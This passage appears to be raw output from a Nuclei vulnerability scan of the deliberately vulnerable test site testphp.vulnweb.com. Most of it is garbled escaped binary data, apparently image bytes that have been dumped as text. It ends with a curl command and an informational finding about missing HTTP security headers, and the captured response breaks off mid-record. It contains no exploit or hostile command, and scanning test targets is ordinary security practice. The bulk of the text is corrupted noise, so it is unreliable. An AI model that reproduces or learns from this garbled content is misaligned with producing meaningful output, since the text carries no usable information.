\ufffd\\ufffd@\\ufffd\\u001bU\\u0010z\\ufffd~\\u001d*D\\ufffd\\ufffd\\ufffd@e\\ufffd\\ufffd\\u0012+\\ufffdoQ\\ufffd\\ufffdVߩ\\ufffd}I\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd{9%L\\ufffdOy\\u0014ÃX\\ufffdz\\ufffd?\\ufffd\\ufffdh\\ufffd\\\"2\\ufffd\\ufffd0\\u000f\\ufffd5ޤѺ\\ufffd\\u000bU\\ufffd\\ufffdZ|\\u000c\\ufffd\\ufffd\\ufffdvv\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\u0003)\\ufffd\\ufffd\\ufffd\\ufffdi\\ufffd\\ufffdR\\ufffd\\ufffd\\ufffdEã\\ufffdo\\ufffdt\\u001f\\u0014\\nc\\ufffd5\\ufffduB\\ufffd\\u000fq\\ufffd\\ufffd\\ufffd\\ufffd\\u001b\\ufffd\\ufffd\\ufffdt\\ufffdH\\ufffd)\\ufffdl\\u0007\\ufffd\\ufffd N\\u0015{\\u001e\\ufffd\\u0003\\ufffdU]\\ufffd7\\u0012`\\ufffd\\tM\\ufffd\\ufffdaT\\ufffd\\ufffdh\\ufffdk\\ufffd-\\u0026\\u001el)=\\ufffd\\u0002\\ufffdF\\u0013k\\ufffd\\ufffd\\u0000\\u0018\\ufffd\\ufffd\\u0000\\ufffdW6\\ufffd\\ufffd$\\ufffd\\ufffdS\\ufffd\\ufffdu\\ufffd\\u000ey\\ufffdeQ\\ufffd\\ufffd\\u0015\\ufffdI9g\\ufffd\\ufffd\\u0017\\ufffd0$\\ufffd\\u0015\\ufffd\\ufffd56\\u000c\\ufffdm\\ufffd\\ufffd#\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdN\\ufffdOq\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdƲh|\\ufffd\\ufffd\\ufffdI/2\\u001a,-\\ufffd\\ufffd\\ufffd$w\\u001d~uE\\ufffd[ \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\\"\\u003c\\ufffdH\\ufffd\\u000c\\ufffd\\ufffd\\u0000;\\ufffd\\u0015R+.A\\ufffd\\ufffdG.F\\u0018K\\u0003vTڞ\\ufffde\\u0013\\ufffd\\ufffd\\u003e\\u0000\\ufffd\\u0002p\\u0007`\\ufffd_\\ufffd:\\ufffd\\u0018\\u0002\\ufffd\\u00000A\\ufffdދ\\ufffdC\\ufffd\\\\!\\ufffd\\u001eJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n\\ufffdH\\ufffdU+Z\\ufffdwQkXBS\\ufffdm\\ufffd\\u0014װ\\ufffd3B\\ufffdȎ\\u0019\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd+J7\\ufffd\\t\\ufffd\\u0000\\ufffdhI\\ufffd\\ufffd\\ufffd\\u0016j\\u0003\\ufffdG΋\\ufffd\\ufffd{C?\\u0018\\ufffd\\u0013`6\\ufffdd\\ufffd\\ufffd3\\ufffd=s\\ufffd\\ufffd`\\ufffd\\ufffd(\\ufffdȟ3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001b'\\ufffd\\ufffdwཥ\\ufffd\\ufffdW\\u0005\\ufffdM|b\\ufffd\\ufffd\\u001fW\\u0000\\u003cظ\\u0007\\ufffd\\t\\ufffd\\u0015Q\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001e%?J3\\ufffd\\u000f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\u000e7\\u000c\\ufffdb\\ufffdօt\\ufffd 3\\ufffd.\\u0006\\ufffd\\ufffd\\ufffd趹\\u001f\\ufffd\\ufffd\\ufffd\\ufffdFYl=\\ufffd\\ufffd\\ufffdR\\ufffda\\ufffd\\u000c\\ufffdB\\ufffd\\ufffd\\ufffdYO\\ufffd\\u001f\\ufffd\\ufffd\\ufffdC_:i\\ufffd\\ufffdײ\\ufffd\\ufffdFY,=\\ufffd\\ufffd\\ufffdR\\ufffda\\ufffd\\u000c\\ufffdb\\ufffd\\ufffd\\ufffdYO\\ufffd\\u0012\\ufffd\\u0007\\ufffde@Gq\\ufffdՅ\\ufffd\\u0026G\\ufffd\\ufffd\\ufffd[\\u000fhg\\ufffd\\u0014\\ufffdX{C?\\u0018\\ufffd\\ufffd\\u0019t\\ufffd \\u00118j\\ufffd\\u0012\\ufffd\\u0011\\ufffdjSa;2G\\ufffd\\u0013F\\ufffd,=\\ufffd\\ufffd\\ufffdRɇ\\ufffdC?\\u0018\\ufffd\\ufffd#\\ufffd\\ufffd`8\\ufffdZOe$yԨ\\ufffdRwfO2h\\ufffd%\\ufffd\\ufffd3\\ufffd\\ufffdYp\\ufffd\\u0000hg\\ufffd\\u00147\\ufffd}6\\ufffd\\ufffd\\u0010\\u000c(\\ufffd\\ufffd\\u001esK\\ufffd\\ufffdDe\\u0003\\ufffdQ\\ufffd\\u0016#k\\ufffd~1K\\ufffd^\\ufffd\\ufffd\\ufffd(oE\\ufffd\\ufffd~\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffd\\ufffdOvSL\\u00188V\\ufffd\\u0008O\\ufffd@\\ufffd\\ufffd{K_\\u0018\\ufffdE\\ufffd\\ufffd埌Q\\ufffd1\\ufffdNH\\ufffd\\u001c\\ufffd\\ufffd\\ufffd M\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd\\ufffd;W$\\ufffdӷ\\ufffd\\r\\ufffd\\rZ\\ufffd$;m\\ufffdc(\\n\\ufffdT\\u0001\\ufffdI\\ufffd4\\ufffd\\ufffd~\\ufffd\\ufffdŅ\\ufffd׽z\\u0016\\ufffd\\u0014 \\u0001\\u0000\\ufffdE\\ufffd$\\ufffdxk\\u001bl8p\\ufffdϨR\\ufffd\\u0008\\ufffd\\u001d-Ŵ;\\ufffd\\ufffd\\ufffdL!\\ufffd\\ufffdV\\u0016\\ufffd\\u0002\\ufffd+\\ufffd\\u0003\\ufffd\\ufffd\\u001f|\\ufffdu\\ufffd\\ufffdb\\u0008k\\ufffd.:\\ufffd\\u0008\\ufffdLƁZ\\ufffdЃ\\ufffdX\\ufffd\\ufffd\\ufffdh/\\ufffd\\ufffd\\ufffd.B\\ufffdeH))!! H\\ufffd!;lg\\ufffd0▪E\\ufffd}P}\\ufffd(\\ufffd\\ufffd\\ufffd)#(%[\\u001d\\ufffd\\ufffd\\ufffdYWQ\\ufffdJ\\ufffd.\\ufffd\\ufffd\\u0000\\ufffd]\\ufffd\\ufffdb/\\u0007\\u0002\\u001cs\\ufffd@P$\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\ufffd\\ufffd\\u0012\\ufffdSM\\ufffd^\\u000e-A\\u0000\\t܉\\ufffdG\\u0018\\ufffd\\u0016\\ufffd\\ufffdo\\u001crԼ\\ufffdE\\ufffdu\\ufffd+*\\ufffd\\ufffd\\ufffd\\u0000F\\ufffd.\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd˶\\ufffd\\u001a\\ufffd\\ufffd-#+\\ufffd7\\u0004J\\u0013\\ufffda\\u001a\\ufffd \\ufffd\\ufffd\\u0002$M\\tu\\u0019\\ufffd\\ufffd\\ufffd;e\\ufffd\\ufffdYx\\ufffd(\\ufffd6\\u001c\\ufffd!\\u0004\\ufffdY\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffd\\u000cN\\ufffd\\u0019E\\ufffdn\\ufffd\\ufffd#\\ufffdm\\ufffd\\ufffd9\\ufffd\\ufffd\\ufffdH1\\ufffd\\u001f\\ufffd\\ufffdڠ\\ufffd\\ufffdɈ\\ufffd\\ufffd\\ufffd[j\\u0015\\ufffd!\\ufffd0\\ufffd\\ufffd\\u0003\\u0007\\ufffd\\u0026\\\"\\u000e\\ufffdj)\\ufffd8\\ufffd\\ufffdIq\\ufffdf\\ufffd\\ufffd}\\ufffd\\ufffd\\u0008\\n'|\\ufffd\\ufffd\\ufffd\\ufffdY+7r\\ufffdJ\\u0017\\ufffd7\\ufffdI\\ufffdU~\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGajȩ\\ufffd\\u003e`x\\ufffd\\ufffdĶ\\ufffd\\ufffd8\\ufffd\\ufffd6\\ufffd]:P\\ufffdFE\\ufffd+*Q\\ufffd\\u0012F\\ufffd\\u00065\\u0010\\ufffdTq\\ufffdC\\u0007yƔ\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\u0011\\ufffd=\\ufffd\\ufffd\\u0019'\\ufffdy\\ufffdv\\ufffdl\\ufffdp\\ufffd_\\u000cqn+\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd$q\\u001eQ\\ufffd?\\u001aYW\\ufffd\\ufffd\\ufffd\\ufffd\\u000fd}\\u001a\\ufffd\\ufffdq7\\u0015\\ufffd\\ufffd۔\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\t\\u0002\\u000f\\u00025\\u001ae\\u001cF\\ufffd\\ufffd\\ufffd8\\ufffd$\\ufffd\\u0016\\ufffd\\ufffd\\\\C\\u0004f\\ufffd\\ufffd2\\ufffd\\u0008\\ufffd\\u001a\\ufffd5\\u0011\\ufffd\\ufffd\\ufffd\\u0002\\ufffd\\ufffdî[\\ufffdKL\\ufffdխh%N\\u0013\\ufffdh\\ufffd\\u0004\\ufffd\\u001c\\u0001\\u0000o:\\ufffdd[\\ufffd]\\ufffdY\\\\\\ufffd\\ufffdбd\\ufffdW(\\u0005\\ufffd\\ufffd\\u0003S\\ufffd\\t\\ufffd\\u0013\\ufffd\\ufffdŨ\\ufffd{\\ufffd\\u0013\\ufffd\\u003cX4\\ufffd\\ufffd1\\u000b\\ufffd\\ufffd,ߘ\\u0004\\ufffd\\ufffd\\ufffd\\u0000\\u0012\\ufffd\\ufffd\\u003c9H\\ufffd\\ufffd4\\ufffdX\\ufffd\\ufffd\\r\\ufffdp]Y\\ufffd\\u0003\\ufffd\\u0000\\u0019\\\"7\\ufffdQ\\ufffd\\u0015\\ufffd/\\ufffdww\\ufffdu,\\\\:۩\\ufffd\\u0008\\ufffd*ˤ\\ufffd7\\u0018\\ufffd\\ufffd\\ufffdo\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd`k\\ufffd\\u001a]\\ufffd\\ufffdmEJ%Dd\\ufffd\\ufffd\\\"gS\\ufffd\\ufffd\\ufffd\\u0013\\ufffd=\\n\\ufffdhe\\ufffd\\ufffd1%J/\\u0016\\u000bn\\ufffdQ\\ufffd۾\\ufffd\\u001fq\\ufffd\\u003cم$\\ufffdj\\ufffd=.\\ufffdR\\ufffd/\\ufffdS\\ufffdhO\\u000e\\ufffd\\u0012\\ufffd$\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZe'e\\r9@\\ufffd֯\\ufffdݦ'\\ufffd\\ufffd\\ufffd\\u0012P\\u0014\\ufffd\\u001c\\ufffd\\ufffd\\ufffdse\\ufffd\\ufffd\\u0003A\\ufffd\\ufffdjZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-4\\ufffd\\u0000Y\\u001bk\\ufffd\\ufffd\\ufffd\\u0000\\ufffdr\\ufffdTBGorv\\u001bӏK\\ufffd\\ufffd\\ufffd}I\\u0003i\\\\\\ufffd\\ufffd7\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffdT\\ufffd\\u00044\\ufffdk\\ufffd\\u001d\\ufffd$\\ufffd\\ufffd;N\\u0013vm\\u0014\\ufffd\\ufffd\\ufffdܘ\\ufffdGw\\u0012|\\u0006\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\ufffd\\n\\ufffd.\\ufffdp\\ufffdt\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd皤\\u001d0\\ufffd*\\ufffd\\ufffd\\ufffd\\u001d\\ufffdSC\\u0016WV\\ufffdo\\ufffd9\\ufffd|\\ufffd\\ufffdC\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffdC\\\"4\\ufffd\\ufffd\\ufffd\\u0013R\\ufffdv\\ufffd.\\ufffd\\ufffd\\u0019\\ufffd\\u001bG\\ufffd\\ufffdVHL\\u0002\\u0006i\\ufffd\\u0006\\ufffd\\ufffd\\ufffd\\ufffdޒ]B\\nV\\ufffd\\u0019i\\ufffdl\\ufffdβ\\ufffdF\\u0012\\u001ce\\ufffd\\ufffd\\ufffdЌ\\ufffd@\\u000e\\ufffd\\u003e\\u0014\\ufffd\\ufffd\\u0016\\ufffdYԄ\\ufffdⳒN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\u0016\\ufffdu\\ufffd\\ufffd\\ufffd\\u0010BB\\ufffd\\u001c\\ufffdT\\ufffd\\ufffd\\ufffd\\u001c7\\ufffd4.\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd(\\ufffdV\\u0008B3\\ufffd\\ufffd6\\ufffdغ\\ufffd\\ufffd/\\ufffd\\u0012îu\\ufffd\\ufffd$\\ufffdW]@\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\ufffda͵\\ufffd4\\u0014\\u001a\\ufffd\\u001ey\\ufffd\\n@\\ufffd'\\ufffd\\ufffd\\u000c\\ufffd\\u0004F\\ufffd\\ufffd\\u000e\\u001a\\ufffd{\\ufffd\\ufffd\\ufffdܦ\\ufffd(\\ufffd\\ufffdFl\\ufffd\\ufffd\\ufffd*ݻ*\\ufffd\\ufffdT\\u0014\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd*\\u0007\\ufffd\\u0006i\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0010\\ufffdt\\ufffd\\ufffd\\ufffd!qw\\ufffd\\ufffdݷ\\ufffd\\u003e\\ufffd\\t\\ufffdcI\\u0011\\ufffd\\ufffdY\\ufffd[\\u00168\\ufffd\\ufffd-\\u0015t\\ufffd\\u003e\\ufffd\\ufffdP\\ufffdҳ\\u0015\\u0026`(\\ufffd\\u001a\\ufffd\\ufffdüP-\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdH\\u001dA=\\ufffd\\ufffdӕ\\u0016٭\\ufffdp\\ufffdmՙ\\ufffdtR\\u0002\\ufffd\\ufffd\\ufffd\\u000f\\ufffdw\\ufffd\\ufffd\\ufffd8G)\\u0007\\ufffdK\\ufffd]N4\\ufffdWn\\ufffd\\u0010\\ufffd\\u0003,\\ufffd\\u000cs\\u0007]\\ufffd3\\\"^HPK\\ufffdF\\ufffdH\\u001a\\ufffdp\\ufffdoDNa]K\\ufffd2\\ufffd\\ufffdHP\\u0008\\ufffd\\ufffdy\\ufffd}\\ufffd\\ufffdU\\ufffd,57=Z\\ufffdn\\ufffd\\ufffd1\\u0019c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\u0016\\u0001c\\n͉\\ufffd\\u0016\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd\\u0008\\ufffd\\ufffdJں\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffdB\\u000bn%3\\u0005\\u0000\\ufffdF\\ufffd{ֵ\\ufffd\\u001bl\\u0008B\\u0019lI\\ufffd\\ufffd))H\\ufffd\\ufffd\\u0003a\\ufffd\\u001d\\ufffd\\ufffdS\\\\\\ufffdn\\u001dYm$+)\\ufffd刐 \\ufffd\\u000c\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu'\\ufffd\\ufffd0\\ufffd\\ufffdҜ\\ufffdi!JP\\ufffd,L\\ufffd\\u0001\\u001aL\\ufffd\\ufffd\\u001fJ\\ufffd|\\ufffd,p\\ufffdKRB^t\\u0005\\ufffd\\u0000\\ufffd\\ufffd\\ufffdh;\\ufffdj\\ufffdͲ\\ufffdԧs\\ufffd\\ufffdH\\ufffdV\\ufffd\\ufffdm\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdC8\\ufffd,\\ufffd!\\ufffd\\ufffd\\ufffd;\\ufffdbg:\\ufffd\\u0004\\ufffd5\\ufffd\\u0018\\u001a\\ufffd\\ufffd.\\ufffd\\u001e\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffd\\u0002oqE\\ufffd\\u0013n\\ufffd\\ufffdR\\u001a \\ufffd\\u0002x}k\\ufffdz\\u0011\\ufffd3\\ufffd\\ufffd\\nn\\ufffd\\ufffd9n\\u0002V\\ufffd$\\ufffd\\ufffd\\ufffdQ׈\\u0002I܃\\ufffdy\\u0026 \\ufffd\\\\\\ufffdT\\ufffd\\ufffdF\\ufffdL@\\u001e\\u0002\\ufffd\\ufffd\\ufffd^\\u001e\\ufffdk\\ufffdu\\ufffd\\ufffd\\ufffdD\\u0018\\ufffd\\ufffd+\\ufffd^\\ufffd\\ufffd\\u0004\\ufffd\\u0019\\u0013\\ufffdY\\ufffd\\u0015\\ufffd\\ufffd\\u001b[莩\\ufffdħi\\ufffd\\u000f\\ufffd:\\ufffd\\ufffd\\ufffdc\\ufffd\\u003c\\u000b\\ufffd6\\u0014d\\ufffd*$\\ufffd\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd]\\ufffd\\tm\\ufffd\\ufffd\\ufffd\\ufffd\\u0002\\u000e\\ufffdR\\ufffd\\ufffdb\\ufffd\\ufffd\\ufffd)\\u0026 \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd@\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd2r\\ufffd)L\\ufffd\\u0000\\ufffd\\u0000\\ufffd\\ufffd\\ufffd,=\\ufffdш\\u000b\\ufffd”\\ufffd܅(\\t\\ufffd\\ufffd\\u0015\\ufffd\\u0004\\ufffd?:1w\\u0017\\ufffd\\ufffdZP\\ufffd\\ufffd%\\t\\ufffd`(\\ufffd\\ufffd\\ufffdD\\ufffd\\ufffd.\\ufffd \\ufffdq\\ufffd\\ufffd\\u0000!\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffdY\\ufffdw+\\ufffd\\ufffd\\u0012\\ufffd,)X\\ufffda`6\\ufffd\\u0018\\ufffd\\ufffd*x\\ufffd1\\u0014K\\ufffdZ\\ufffd\\ufffd\\u0007\\ufffdz\\ufffd,\\ufffd\\ufffdHS\\u0004\\ufffd)\\u0006\\u000c\\ufffdG\\u0001 \\ufffd\\ufffd\\ufffd\\u0018\\ufffd\\ufffdıD\\ufffd\\ufffd\\ufffd*ԭZ\\u00007\\ufffd\\ufffd\\u0015\\ufffd\\ufffd\\\\=\\t’\\ufffdR-\\ufffd\\ufffd\\ufffd\\u0010]\\ufffdh\\ufffd\\ufffd]~T\\ufffd\\ufffde(Ő\\u0005\\ufffdp\\ufffd\\ufffd\\ufffd\\u0004\\u0003\\ufffd\\u001a\\ufffd*+2kZ\\ufffd\\u0015Z\\u0000D\\u0014\\u0008\\ufffdYB9V\\ufffdp\\u0002L\\ufffdԤ\\ufffd\\ufffdIWn\\ufffd\\ufffd\\u0016\\ufffd\\ufffdm\\u0026@\\ufffd\\ufffdL\\ufffd37\\u001a\\ufffd\\ufffdRX)YЂ)\\ufffd\\ufffd \\tN\\u001eop\\ufffd/\\ufffdR\\ufffd\\ufffd\\u000eGF\\ufffdDhF\\ufffd6:\\ufffdM2ѻ\\ufffd[\\ufffd\\ufffd\\u0001SZ\\u0012\\ufffdǺ\\ufffdC\\ufffdAkv\\ufffd\\ufffdQ\\r\\ufffd\\u0018:\\ufffdH\\ufffd\\ufffdD*]\\ufffdU\\ufffdH\\n\\ufffdII\\u0013\\u001bH\\u001e\\u0015\\ufffdnQn-`(\\ufffd\\ufffd\\ufffd\\ufffdG\\u0010\\ufffd\\u0013\\ufffdv\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffd5a\\u0017\\ufffdD\\ufffd\\ufffd\\u0000\\ufffd\\ufffdu\\ufffd\\ufffd\\ufffdx\\ufffd\\u0008y\\ufffd\\ufffd\\ufffd\\u0000\\u0002#\\ufffd\\ufffd\\u001bT\\ufffd\\ufffdJ\\ufffdz\\ufffd\\u0007Q\\ufffd\\ufffdc_\\ufffdY%L(%o\\u0010hu\\ufffd7\\tZb\\u0012\\ufffd\\\"u\\ufffd\\ufffdH\\ufffdTn\\\\\\ufffdܽVT\\u0015+\\ufffd\\n\\ufffd\\u0012\\u000e\\ufffd\\ufffdX\\ufffd踸jє\\ufffd\\u001a\\ufffd~\\ufffd뫺ZD\\ufffd\\ufffd\\ufffdc0\\u0004\\u001f\\ufffdW\\ufffdd.\\ufffd\\ufffdIq3m`\\ufffd\\ufffdc9\\u0019\\u001bo\\ufffd\\ufffdY\\u003eC\\ufffd\\ufffd\\ufffd-\\ufffd%\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffd'X'\\ufffdO\\ufffd\\ufffd[\\ufffd\\ufffdn\\ufffdajNl\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd:V\\ufffd\\ufffdʄ'a\\ufffdkm$\\ufffd\\u001e\\ufffd\\ufffdS\\u0002\\ufffdy\\ufffd\\u0015\\u0003A\\ufffd_€a\\ufffd.\\ufffd\\u0001\\ufffd!#\\ufffd\\ufffd\\ufffdJ\\ufffdI\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdg \\ufffdGuk\\ufffdq`\\u0010\\ufffd\\ufffd-\\ufffd/1\\n'y\\ufffd\\ufffd/4\\ufffd25\\u0006x\\ufffd\\u0014\\ufffd\\ufffd\\u0010u\\ufffd\\u001ba\\ufffd`%:\\ufffdG\\u00045\\ufffd3j\\ufffd\\ufffdH8\\ufffd\\ufffd\\u0004\\ufffd\\u0000\\ufffdPU\\ufffd'¶1|=~\\ufffd\\ufffd[Z\\u0003-\\ufffd\\ufffd\\ufffd:\\ufffdy\\ufffd\\ufffd\\ufffd\\u001d\\u0012e-\\u0002\\ufffd$\\ufffd\\ufffd \\rD\\ufffdυ[\\ufffdR\\ufffdc\\r-)!\\u000f9\\ufffdW08\\u0008\\ufffd|\\ufffd\\u0014\\ufffd7VȄX\\u0026(ղ\\ufffds\\u0002\\u0008%*\\ufffd\\u001fޝ\\ufffd\\\\e\\u0018\\ufffd\\ufffdWn\\ufffd\\ufffd\\ufffdO\\u003e:\\ufffd\\ufffd\\ufffd\\u0026\\ufffd\\n\\u001c$fȭ\\ufffd\\ufffd@\\ufffd\\u0002\\ufffd (F\\ufffd)\\ufffd˽Ir\\u0017$\\ufffd٣qg\\n\\ufffd\\ufffd\\u0019\\ufffd\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\u0000T\\ufffd\\u000c\\u001f\\ufffd\\u001c\\ufffd6\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd(\\ufffd\\ufffd'.i\\ufffd׉\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdʙ\\ufffd;q\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffdFRM\\ufffdJ\\ufffdR\\t\\ufffd\\u001b\\ufffd\\u001fÊ\\ufffd*\\u0000\\ufffd\\ufffd\\ufffd0EJ\\ufffd\\ufffd\\u0000\\ufffd\\ufffd \\u000eU\\ufffd\\u0002\\ufffd\\tY\\ufffd䟥[w\\ufffd\\n\\ufffd\\u0000Ӑ\\ufffdP\\ufffd\\ufffdW\\t5\\ufffd\\ufffd6\\ufffd\\u0001eAGI\\u001a\\u0011\\ufffdUD)eq$\\ufffdw\\ufffd|\\ufffdVR\\u0012\\ufffd\\u0008\\ufffdt\\\"L\\ufffdƄ\\ufffd\\ufffd\\t\\ufffdڛ\\ufffd\\ufffdL\\ufffds\\u001e4\\ufffd|\\ufffd\\ufffd\\u0001\\u0000\\u0001\\ufffd\\u0001\\ufffd\\ufffd\\ufffdJ\\ufffd2\\ufffdG7*\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\u000e\\ufffd\\nT\\ufffd\\ufffd\\u003c\\u0012\\ufffd\\ufffd\\ufffd\\ufffdvaCj\\ufffd\\ufffd\\ufffd\\ufffd*p\\ufffd\\ufffd\\u001b\\ufffd#\\ufffdTEڒ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdM\\u000f=\\ufffdB\\ufffd'bi\\ufffd)?\\u00029\\ufffdy-\\ufffd.V\\ufffd\\ufffd\\ufffd\\u0004\\ufffd́\\ufffd\\ufffd\\ufffd]\\ufffd:\\ufffd\\u0015\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffd\\ufffdrgi֚\\ufffd\\u001f\\ufffd\\ufffdU\\ufffd\\ufffd:xҚ\\u0007\\ufffd\\u0012\\ufffdp\\ufffdУ\\ufffdS\\ufffd\\rj\\ufffdM\\ufffd\\ufffd\\ufffd\\u0006\\ufffdx\\u0011\\ufffdR\\ufffdO\\ufffduQ\\u003c\\ufffdY\\ufffd\\u0014\\ufffd\\ufffdJ\\ufffdO}3\\ufffdQ\\ufffd懲\\u0015\\ufffdҖ\\u0000H\\u0003\\ufffd\\ufffdL٥e!*\\ufffdxD\\ufffda\\t#:\\t\\ufffd\\ufffd\\ufffdJ\\ufffd\\u0010\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\u0026*\\ufffd)\\\"\\ufffd(ˆ\\u0014aL\\u000b\\u001bR\\ufffd\\ufffd\\u001a\\ufffd\\u0010A(\\u003cx\\ufffd\\ufffdP\\ufffdJ\\ufffdUqrd\\ufffd5#6\\ufffd'\\ufffdZ\\r::\\ufffd\\ufffd\\u0010L\\ufffdsN\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdw\\ufffd\\ufffd²z\\ufffdm*\\ufffd4\\ufffd\\u00007\\u0026\\u0016gp5=\\ufffd\\ufffdR\\ufffd\\ufffd*A\\ufffdP\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffdي\\ufffdՙ\\ufffd*%i@$\\ufffd`i\\ufffdk!\\ufffd!S\\u001a\\ufffd|\\ufffdҥ\\\\\\ufffd\\u000e\\ufffd\\ufffd$\\u0014\\ufffd\\u0002t\\ufffdj\\u00022\\ufffd@m R\\ufffdW\\ufffd1f̤\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u0017\\ufffd\\u0012\\ufffd\\ufffdp\\ufffd\\ufffdJ\\ufffd\\u0008Ե(\\ufffdcz\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdiR\\ufffdPV\\ufffd\\u000c\\ufffdy%m\\ufffd\\ufffd\\ufffd\\u001fqS%\\u00031\\u001e?*T\\ufffd\\u003eE\\u0011\\u00039\\u0011\\ufffd\\u003e\\ufffdj\\ufffd\\t\\ufffd\\u003e\\ufffdR\\ufffdQ\\u0001\\ufffdN\\ufffd\\u0014\\ufffdz\\ufffd@ޕ*Ҹ2ˑ\\ufffd\\u00026\\u001bTKBH:R\\ufffdQ\\ufffd\\u001c[I))\\u0012\\u0007q\\ufffdLI\\u0001\\u000f\\u00109q\\ufffdJ\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffdP\\ufffd\\ufffd\\\\P\\u0011=\\ufffd\\ufffdUf\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:38.070888478Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/8.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"cross-origin-opener-policy\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"path\":\"/pictures/5.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"request\":\"GET /pictures/5.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4428\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:12 GMT\\r\\nEtag: \\\"4dca64a1-114c\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: 